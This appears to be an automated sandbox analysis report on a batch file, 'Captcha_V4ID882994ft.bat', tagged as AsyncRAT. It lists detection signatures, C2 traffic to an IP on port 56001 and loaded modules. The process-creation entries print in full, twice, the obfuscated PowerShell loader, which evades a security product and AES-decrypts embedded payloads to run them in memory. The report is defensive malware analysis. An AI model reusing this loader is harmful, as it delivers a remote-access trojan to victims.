Windows Analysis Report
Captcha_V4ID882994ft.bat

Overview

General Information

Sample name: Captcha_V4ID882994ft.bat
Analysis ID: 1520617
MD5: 5744e74d67f4cc91f262ddb95ac245a3
SHA1: 890799de73d375478d3a5f0e2b86cec6a0585a91
SHA256: e726d3324ca8b9a8da4d317c5d749dd0ad58fd447a2eb5eee75ef14824339cd5
Tags: AsyncRATbatRATuser-abuse_ch
Infos:

Detection

Score: 56
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
AI detected suspicious sample
Suspicious powershell command line found
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

AV Detection
barindex
Multi AV Scanner detection for submitted file
Source: Captcha_V4ID882994ft.bat ReversingLabs: Detection: 31%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 90.4% probability
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.6:49731 -> 185.91.69.119:56001
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: unknown TCP traffic detected without corresponding DNS query: 185.91.69.119
Source: global traffic DNS traffic detected: DNS query: tse1.mm.bing.net
Source: svchost.exe, 0000000F.00000002.4064491206.000001DAEF093000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: qmgr.db.15.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.15.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
Source: qmgr.db.15.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.15.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.15.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.15.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.15.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.15.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000006.00000002.2138380420.00000000053F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.2138380420.00000000053C8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2138380420.00000000053B9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: edb.log.15.dr String found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 0000000F.00000003.2444946900.000001DAEEF00000.00000004.00000800.00020000.00000000.sdmp, edb.log.15.dr String found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp Jump to behavior
Very long command line found
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2284
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2284 Jump to behavior
Source: classification engine Classification label: mal56.winBAT@9/12@1/2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\efa01b9c3f
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4788:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h3ntb4tm.ugs.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Captcha_V4ID882994ft.bat" "
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: Captcha_V4ID882994ft.bat ReversingLabs: Detection: 31%
Source: powershell.exe String found in binary or memory: prompt"PS $($executionContext.SessionState.Path.CurrentLocation)$('>' * ($nestedPromptLevel + 1)) ";# .Link# https://go.microsoft.com/fwlink/?LinkID=225750# .ExternalHelp System.Management.Automation.dll-help.xml$global:?
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Captcha_V4ID882994ft.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\Captcha_V4ID882994ft.bat';$KKOH='GcdBHetcdBHCcdBHurcdBHrecdBHntcdBHPcdBHrcdBHocecdBHscdBHs'.Replace('cdBH', ''),'TrbvJsanbvJssfbvJsorbvJsmFibvJsnabvJslBbvJslobvJsckbvJs'.Replace('bvJs', ''),'MaiJRdinMiJRdodiJRduiJRdle'.Replace('iJRd', ''),'EpyvRlepyvRmepyvRntpyvRAt'.Replace('pyvR', ''),'EnAikltAiklryPAikloAikliAiklnt'.Replace('Aikl', ''),'ReaUbTzdLUbTzinUbTzes'.Replace('UbTz', ''),'ChRklaanRklageRklaExRklateRklanRklasiRklaon'.Replace('Rkla', ''),'LoucGWaducGW'.Replace('ucGW', ''),'CYNdvreYNdvaYNdvtYNdveDeYNdvcYNdvrYNdvypYNdvtoYNdvrYNdv'.Replace('YNdv', ''),'CoYevgpyYevgToYevg'.Replace('Yevg', ''),'InoGKEvooGKEkeoGKE'.Replace('oGKE', ''),'FWztZromWztZBWztZasWztZeWztZ6WztZ4WztZStrWztZinWztZg'.Replace('WztZ', ''),'SIszbplIszbiIszbtIszb'.Replace('Iszb', ''),'DeAYONcomAYONprAYONessAYON'.Replace('AYON', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($KKOH[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function rUbtz($WsNJE){$aFysz=[System.Security.Cryptography.Aes]::Create();$aFysz.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aFysz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aFysz.Key=[System.Convert]::($KKOH[11])('SiNWeP/fk7RgqOL4+MYNGAilPoSRNS1a+HTyg2gC1Lk=');$aFysz.IV=[System.Convert]::($KKOH[11])('yZOGdg/vBGiLeun/JpgA4Q==');$FQbge=$aFysz.($KKOH[8])();$auohI=$FQbge.($KKOH[1])($WsNJE,0,$WsNJE.Length);$FQbge.Dispose();$aFysz.Dispose();$auohI;}function LYeXU($WsNJE){$PsBXz=New-Object System.IO.MemoryStream(,$WsNJE);$qJWpS=New-Object System.IO.MemoryStream;$KUcRl=New-Object System.IO.Compression.GZipStream($PsBXz,[IO.Compression.CompressionMode]::($KKOH[13]));$KUcRl.($KKOH[9])($qJWpS);$KUcRl.Dispose();$PsBXz.Dispose();$qJWpS.Dispose();$qJWpS.ToArray();}$cnXBi=[System.IO.File]::($KKOH[5])([Console]::Title);$gbxFr=LYeXU (rUbtz ([Convert]::($KKOH[11])([System.Linq.Enumerable]::($KKOH[3])($cnXBi, 5).Substring(2))));$hwaTP=LYeXU (rUbtz ([Convert]::($KKOH[11])([System.Linq.Enumerable]::($KKOH[3])($cnXBi, 6).Substring(2))));[System.Reflection.Assembly]::($KKOH[7])([byte[]]$hwaTP).($KKOH[4]).($KKOH[10])($null,$null);[System.Reflection.Assembly]::($KKOH[7])([byte[]]$gbxFr).($KKOH[4]).($KKOH[10])($null,$null); "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\Captcha_V4ID882994ft.bat';$KKOH='GcdBHetcdBHCcdBHurcdBHrecdBHntcdBHPcdBHrcdBHocecdBHscdBHs'.Replace('cdBH', ''),'TrbvJsanbvJssfbvJsorbvJsmFibvJsnabvJslBbvJslobvJsckbvJs'.Replace('bvJs', ''),'MaiJRdinMiJRdodiJRduiJRdle'.Replace('iJRd', ''),'EpyvRlepyvRmepyvRntpyvRAt'.Replace('pyvR', ''),'EnAikltAiklryPAikloAikliAiklnt'.Replace('Aikl', ''),'ReaUbTzdLUbTzinUbTzes'.Replace('UbTz', ''),'ChRklaanRklageRklaExRklateRklanRklasiRklaon'.Replace('Rkla', ''),'LoucGWaducGW'.Replace('ucGW', ''),'CYNdvreYNdvaYNdvtYNdveDeYNdvcYNdvrYNdvypYNdvtoYNdvrYNdv'.Replace('YNdv', ''),'CoYevgpyYevgToYevg'.Replace('Yevg', ''),'InoGKEvooGKEkeoGKE'.Replace('oGKE', ''),'FWztZromWztZBWztZasWztZeWztZ6WztZ4WztZStrWztZinWztZg'.Replace('WztZ', ''),'SIszbplIszbiIszbtIszb'.Replace('Iszb', ''),'DeAYONcomAYONprAYONessAYON'.Replace('AYON', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($KKOH[0])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function rUbtz($WsNJE){$aFysz=[System.Security.Cryptography.Aes]::Create();$aFysz.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aFysz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aFysz.Key=[System.Convert]::($KKOH[11])('SiNWeP/fk7RgqOL4+MYNGAilPoSRNS1a+HTyg2gC1Lk=');$aFysz.IV=[System.Convert]::($KKOH[11])('yZOGdg/vBGiLeun/JpgA4Q==');$FQbge=$aFysz.($KKOH[8])();$auohI=$FQbge.($KKOH[1])($WsNJE,0,$WsNJE.Length);$FQbge.Dispose();$aFysz.Dispose();$auohI;}function LYeXU($WsNJE){$PsBXz=New-Object System.IO.MemoryStream(,$WsNJE);$qJWpS=New-Object System.IO.MemoryStream;$KUcRl=New-Object System.IO.Compression.GZipStream($PsBXz,[IO.Compression.CompressionMode]::($KKOH[13]));$KUcRl.($KKOH[9])($qJWpS);$KUcRl.Dispose();$PsBXz.Dispose();$qJWpS.Dispose();$qJWpS.ToArray();}$cnXBi=[System.IO.File]::($KKOH[5])([Console]::Title);$gbxFr=LYeXU (rUbtz ([Convert]::($KKOH[11])([System.Linq.Enumerable]::($KKOH[3])($cnXBi, 5).Substring(2))));$hwaTP=LYeXU (rUbtz ([Convert]::($KKOH[11])([System.Linq.Enumerable]::($KKOH[3])($cnXBi, 6).Substring(2))));[System.Reflection.Assembly]::($KKOH[7])([byte[]]$hwaTP).($KKOH[4]).($KKOH[10])($null,$null);[System.Reflection.Assembly]::($KKOH[7])([byte[]]$gbxFr).($KKOH[4]).($KKOH[10])($null,$null); " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior

Data Obfuscation
barindex
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
